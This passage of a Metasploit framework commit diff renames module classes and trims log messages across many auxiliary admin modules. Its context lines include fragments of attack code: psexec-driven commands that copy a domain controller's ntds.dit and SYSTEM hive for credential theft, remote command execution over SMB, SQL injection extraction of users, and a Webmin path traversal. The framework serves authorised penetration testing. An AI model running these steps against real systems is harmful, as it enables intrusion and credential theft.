Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index 9a811c4d1d..4d588e1f2b 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres diff --git a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb index 43f91cf73e..39dd75f68e 100644 --- a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb +++ b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb index 383b187968..23d106176d 100644 --- a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb +++ b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 7e77949291..b3a912e0b1 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Exploiting sqli to extract users information...") + print_status("Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) rand = Rex::Text.rand_text_numeric(2) separator = Rex::Text.rand_text_alpha(5 + rand(5)) @@ -134,21 +134,21 @@ class Metasploit3 < Msf::Auxiliary data = do_sqli(injection, mark) if data.blank? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end @users = [] @plain_passwords = [] - print_status("#{peer} - Parsing extracted data...") + print_status("Parsing extracted data...") parse_users(data, mark, separator) if @users.empty? - print_error("#{peer} - Users not found") + print_error("Users not found") return else - print_good("#{peer} - #{@users.length} users found!") + print_good("#{@users.length} users found!") end users_table = Rex::Ui::Text::Table.new( diff --git a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb index 2251e33566..0325a8274b 100644 --- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb +++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/modicon_command.rb b/modules/auxiliary/admin/scada/modicon_command.rb index 53bf52ea84..fd29955621 100644 --- a/modules/auxiliary/admin/scada/modicon_command.rb +++ b/modules/auxiliary/admin/scada/modicon_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/modicon_password_recovery.rb b/modules/auxiliary/admin/scada/modicon_password_recovery.rb index aabbdc4cc3..1d91e140a4 100644 --- a/modules/auxiliary/admin/scada/modicon_password_recovery.rb +++ b/modules/auxiliary/admin/scada/modicon_password_recovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb index 4906829d56..fc0368f945 100644 --- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb +++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/multi_cip_command.rb b/modules/auxiliary/admin/scada/multi_cip_command.rb index 6abc81f58e..5561973f04 100644 --- a/modules/auxiliary/admin/scada/multi_cip_command.rb +++ b/modules/auxiliary/admin/scada/multi_cip_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb index 6d0dde4b03..2c83b0530b 100644 --- a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb +++ b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::TcpServer diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index b12195b257..61bf21da5b 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Rex::Platforms::Windows diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 3f85ac29ef..70a0b33446 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/delete_file.rb b/modules/auxiliary/admin/smb/delete_file.rb index 417aea54d2..a6c409ec32 100644 --- a/modules/auxiliary/admin/smb/delete_file.rb +++ b/modules/auxiliary/admin/smb/delete_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/download_file.rb b/modules/auxiliary/admin/smb/download_file.rb index d6aa05a4b6..07672ac4d4 100644 --- a/modules/auxiliary/admin/smb/download_file.rb +++ b/modules/auxiliary/admin/smb/download_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index 53e52f66e8..011b0d9c60 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 749b32d22e..5747494726 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client::Psexec include Msf::Auxiliary::Report @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary begin smb_login rescue Rex::Proto::SMB::Exceptions::Error => autherror - print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") + print_error("Unable to authenticate with given credentials: #{autherror}") return end res = execute_command(text, bat) @@ -96,31 +96,31 @@ class Metasploit3 < Msf::Auxiliary def execute_command(text, bat) # Try and execute the provided command execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}" - print_status("#{peer} - Executing the command...") + print_status("Executing the command...") begin return psexec(execute) rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => exec_command_error elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3) - print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") + print_error("Unable to execute specified command: #{exec_command_error}") return false end end # Retrive output from command def get_output(file) - print_status("#{peer} - Getting the command output...") + print_status("Getting the command output...") output = smb_read_file(@smbshare, @ip, file) if output.nil? - print_error("#{peer} - Error getting command output. #{$!.class}. #{$!}.") + print_error("Error getting command output. #{$!.class}. #{$!}.") return end if output.empty? - print_status("#{peer} - Command finished with no output") + print_status("Command finished with no output") return end # Report output - print_good("#{peer} - Command completed successfuly!") + print_good("Command completed successfuly!") vprint_status("Output for \"#{datastore['COMMAND']}\":") vprint_line("#{output}") @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary fd = smb_open(file, 'rwo') fd.close rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror - print_status("#{peer} - Unable to get handle: #{accesserror}") + print_status("Unable to get handle: #{accesserror}") return false end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -155,19 +155,19 @@ class Metasploit3 < Msf::Auxiliary # Removes files created during execution. def cleanup_after(*files) simple.connect("\\\\#{@ip}\\#{@smbshare}") - print_status("#{peer} - Executing cleanup...") + print_status("Executing cleanup...") files.each do |file| begin smb_file_rm(file) rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror - print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") + print_error("Unable to cleanup #{file}. Error: #{cleanuperror}") end end left = files.collect{ |f| smb_file_exist?(f) } if left.any? - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") else - print_status("#{peer} - Cleanup was successful") + print_status("Cleanup was successful") end end diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index dc1fd03215..0e7d8b9cf3 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client::Psexec @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']), OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']), OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']), - OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']), + OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', false]), ], self.class) end @@ -61,15 +61,15 @@ class Metasploit3 < Msf::Auxiliary begin smb_login rescue StandardError => autherror - print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") + print_error("Unable to authenticate with given credentials: #{autherror}") return end # If a VSC was specified then don't try and create one if datastore['VSCPATH'].length > 0 - print_status("#{peer} - Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") + print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") vscpath = datastore['VSCPATH'] else - unless datastore['CREATE_NEW_VSC'] == true + unless datastore['CREATE_NEW_VSC'] vscpath = check_vss(text, bat) end unless vscpath @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary download_ntds((datastore['WINPATH'] + "\\Temp\\ntds")) download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys")) else - print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.") + print_error("Failed to find a volume shadow copy. Issuing cleanup command sequence.") end end cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys") @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary # then creating a new one def check_vss(text, bat) begin - print_status("#{peer} - Checking if a Volume Shadow Copy exists already.") + print_status("Checking if a Volume Shadow Copy exists already.") prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy' command = "%COMSPEC% /C echo vssadmin list shadows ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" result = psexec(command) @@ -102,14 +102,14 @@ class Metasploit3 < Msf::Auxiliary vscs = [] data.each_line { |line| vscs << line if line.include?("GLOBALROOT") } if vscs.empty? - print_status("#{peer} - No VSC Found.") + print_status("No VSC Found.") return nil end vscpath = prepath + vscs[vscs.length - 1].to_s.split("ShadowCopy")[1].to_s.chomp - print_good("#{peer} - Volume Shadow Copy exists on #{vscpath}") + print_good("Volume Shadow Copy exists on #{vscpath}") return vscpath rescue StandardError => vsscheckerror - print_error("#{peer} - Unable to determine if VSS is enabled: #{vsscheckerror}") + print_error("Unable to determine if VSS is enabled: #{vsscheckerror}") return nil end end @@ -120,16 +120,16 @@ class Metasploit3 < Msf::Auxiliary begin #Try to create the shadow copy command = "%COMSPEC% /C echo #{createvsc} ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" - print_status("#{peer} - Creating Volume Shadow Copy") + print_status("Creating Volume Shadow Copy") out = psexec(command) #Get path to Volume Shadow Copy vscpath = get_vscpath(text) rescue StandardError => vscerror - print_error("#{peer} - Unable to create the Volume Shadow Copy: #{vscerror}") + print_error("Unable to create the Volume Shadow Copy: #{vscerror}") return nil end if vscpath - print_good("#{peer} - Volume Shadow Copy created on #{vscpath}") + print_good("Volume Shadow Copy created on #{vscpath}") return vscpath else return nil @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary end return true rescue StandardError => ntdscopyerror - print_error("#{peer} - Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}") + print_error("Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}") return false end end @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary # Checks if ntds.dit was copied to the Windows Temp directory def check_ntds(text) - print_status("#{peer} - Checking if NTDS.dit was copied.") + print_status("Checking if NTDS.dit was copied.") check = "%COMSPEC% /C dir \\#{datastore['WINPATH']}\\Temp\\ntds > #{text}" run = psexec(check) output = smb_read_file(@smbshare, @ip, text) @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y" return psexec(command) rescue StandardError => hiveerror - print_error("#{peer} - Unable to copy the SYSTEM hive file: #{hiveerror}") + print_error("Unable to copy the SYSTEM hive file: #{hiveerror}") return false end end @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Auxiliary # Download the ntds.dit copy to your attacking machine def download_ntds(file) - print_status("#{peer} - Downloading ntds.dit file") + print_status("Downloading ntds.dit file") begin # Try to download ntds.dit simple.connect("\\\\#{@ip}\\#{@smbshare}") @@ -190,9 +190,9 @@ class Metasploit3 < Msf::Auxiliary data = remotefile.read remotefile.close ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit") - print_good("#{peer} - ntds.dit stored at #{ntds_path}") + print_good("ntds.dit stored at #{ntds_path}") rescue StandardError => ntdsdownloaderror - print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}") + print_error("Unable to downlaod ntds.dit: #{ntdsdownloaderror}") return ntdsdownloaderror end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary # Download the SYSTEM hive copy to your attacking machine def download_sys_hive(file) - print_status("#{peer} - Downloading SYSTEM hive file") + print_status("Downloading SYSTEM hive file") begin # Try to download SYSTEM hive simple.connect("\\\\#{@ip}\\#{@smbshare}") @@ -209,9 +209,9 @@ class Metasploit3 < Msf::Auxiliary data = remotefile.read remotefile.close hive_path = store_loot("psexec.ntdsgrab.hive", "application/octet-stream", @ip, data, "system-hive") - print_good("#{peer} - SYSTEM hive stored at #{hive_path}") + print_good("SYSTEM hive stored at #{hive_path}") rescue StandardError => sysdownloaderror - print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}") + print_error("Unable to download SYSTEM hive: #{sysdownloaderror}") return sysdownloaderror end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -229,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary end return prepath + vsc.split("ShadowCopy")[1].chomp rescue StandardError => vscpath_error - print_error("#{peer} - Could not determine the exact path to the VSC check your WINPATH") + print_error("Could not determine the exact path to the VSC check your WINPATH") return nil end end @@ -237,21 +237,21 @@ class Metasploit3 < Msf::Auxiliary # Removes files created during execution. def cleanup_after(*files) simple.connect("\\\\#{@ip}\\#{@smbshare}") - print_status("#{peer} - Executing cleanup...") + print_status("Executing cleanup...") files.each do |file| begin if smb_file_exist?(file) smb_file_rm(file) end rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror - print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") + print_error("Unable to cleanup #{file}. Error: #{cleanuperror}") end end left = files.collect{ |f| smb_file_exist?(f) } if left.any? - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") else - print_status("#{peer} - Cleanup was successful") + print_status("Cleanup was successful") end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") end diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index e0c7b914b6..5d809e37a6 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index b52f54f8a1..6580411c71 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 24d11c9978..6a03ca85e6 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC diff --git a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb index 9618c5eed9..d02081daa8 100644 --- a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb +++ b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Rex::Proto::TFTP include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index 5e63df3926..5ed08b4865 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/upnp/soap_portmapping.rb b/modules/auxiliary/admin/upnp/soap_portmapping.rb index 4ddc743e52..a7d4a52622 100644 --- a/modules/auxiliary/admin/upnp/soap_portmapping.rb +++ b/modules/auxiliary/admin/upnp/soap_portmapping.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize diff --git a/modules/auxiliary/admin/vmware/poweroff_vm.rb b/modules/auxiliary/admin/vmware/poweroff_vm.rb index 08d8294543..0069b455de 100644 --- a/modules/auxiliary/admin/vmware/poweroff_vm.rb +++ b/modules/auxiliary/admin/vmware/poweroff_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/poweron_vm.rb b/modules/auxiliary/admin/vmware/poweron_vm.rb index 826dd96338..3b20dbe4b2 100644 --- a/modules/auxiliary/admin/vmware/poweron_vm.rb +++ b/modules/auxiliary/admin/vmware/poweron_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/tag_vm.rb b/modules/auxiliary/admin/vmware/tag_vm.rb index 30de864641..1c825f62f3 100644 --- a/modules/auxiliary/admin/vmware/tag_vm.rb +++ b/modules/auxiliary/admin/vmware/tag_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb index 97b3bfb1e5..284198a04b 100644 --- a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb +++ b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index 09bd23daf3..08de7df684 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) diff --git a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb index 4b15e11364..d95582eace 100644 --- a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb +++ b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb index e857b9eb34..5c737a13e8 100644 --- a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb +++ b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb index f179f7ef4c..db348c3865 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb index 106dbfba96..15157e9313 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 4381c2addd..352625b1b8 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -71,17 +71,17 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 302 and res.get_cookies =~ /sid/ session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? - print_good "#{peer} - Authentication successful" + print_good "Authentication successful" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status("#{peer} - Attempting to retrieve #{datastore['RPATH']}...") + print_status("Attempting to retrieve #{datastore['RPATH']}...") traversal = "../" * datastore['DEPTH'] traversal << datastore['RPATH'] @@ -98,9 +98,9 @@ class Metasploit3 < Msf::Auxiliary loot = $1 f = ::File.basename(datastore['RPATH']) path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH']) - print_status("#{peer} - #{datastore['RPATH']} saved in #{path}") + print_status("#{datastore['RPATH']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file") + print_error("Failed to retrieve the file") return end diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index dceb166244..e43c5849bf 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/zend/java_bridge.rb b/modules/auxiliary/admin/zend/java_bridge.rb index f02adcbf4d..dd858742f5 100644 --- a/modules/auxiliary/admin/zend/java_bridge.rb +++ b/modules/auxiliary/admin/zend/java_bridge.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index 52969f35b0..7fd0a99c39 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index e1137d8945..56bd36b89e 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index 2b3483c60f..0a7b751087 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ 